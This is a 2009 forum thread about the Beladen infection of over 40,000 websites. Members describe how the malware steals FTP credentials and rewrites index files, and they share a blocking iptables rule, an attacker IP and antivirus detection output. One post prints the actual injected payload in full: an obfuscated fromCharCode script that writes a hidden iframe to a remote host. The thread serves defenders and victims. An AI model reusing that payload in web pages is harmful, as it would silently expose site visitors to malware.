Over 40,000 Websites Infected By Growing Beladen Virus

Posted by dylan4 (eSoft.in Trusted Member, Australia), 06-06-2009, 01:29 PM


More than 40,000 websites have fallen victim to a virus attack that is still growing, security experts have said.

Security firm Websense says the site beladen.net is infecting legitimate websites all over the world with malicious code that then tries to install malware on the computers of people visiting them.

The Beladen virus is still active, with the number of affected sites growing from 20,000 to over 40,000 since Friday.

Carl Leonard, security research manager for EMEA at Websense, said the Beladen virus poses a "pretty serious" threat to users.

"We are trying to look into how these sites are compromised in the first place," he said. Anti-virus detection capability is also not that high, with 13 out of 40 systems tested by Websense failing to detect the malware.

http://www.computerweekly.com/Articles/2009/06/03/236279/over-40000-sites-infected-by-growing-beladen-virus.htm
I had one client that was infected with this virus. Apparently it logs FTP information, then tries to log in via FTP; once logged in, the virus adds malicious code to all index.* files and then spreads itself to visitors of the victim's website.

Here is the malicious code the virus embeds into the files:

<?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>'; ?> 
 
Whenever someone visits an infected website it will prompt them to download a malicious PDF document, and if Adobe Reader is installed it will exploit Adobe Reader and install trojans on the victim's system.

There have been numerous reports on both the DirectAdmin and cPanel forums.

http://www.directadmin.com/forum/showthread.php?p=157823
http://forums.cpanel.net/general/62821-iframe-javascript-hacks-35.html 
 
We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their FTP credentials from their stored passwords or (more likely) sniffing their username and password during an FTP session, since FTP is a cleartext protocol. The virus would then either "phone home" or fire up its own FTP connection and download all .htm, .html and .php files from the user's account, add its iframe or JS code and re-upload them.

Just changing the FTP password makes no difference since the new password is compromised the very next time they make a connection (usually to fix their pages).

The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.

http://www.directadmin.com/forum/showpost.php?p=158146&postcount=22 
 
The IP that is responsible for adding the malicious code:

91.212.65.147

http://whois.domaintools.com/91.212.65.0
 
If you're running a Windows machine, I recommend you uninstall Adobe PDF Reader and install Avira Premium Security Suite, as it detects and prevents this virus.

http://www.avira.com/en/downloads/avira_premium_security_suite.html 
 
If you're a webmaster, webhost, or internet user, I recommend blocking this IP range with your firewall:

91.212.65.0/24

IP Tables:

iptables -I INPUT -s 91.212.65.0/24 -j DROP

An easy way to see if your website has been infected would be to download a backup of your files and scan the backup archive with Avira Premium Security Suite.

--> ./tmp/webalizerftp/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/ips_kernel/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/converge_local/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/public/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/uploads/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/interface/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/cache/index.html
  [DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
 
If you have been infected, then scan your computer for viruses, and change your passwords after your machine is virus free.
LinkBack to this Thread: http://forum.esoft.in/public-announcements/58668-over-40-000-websites-infected-growing-beladen-virus.html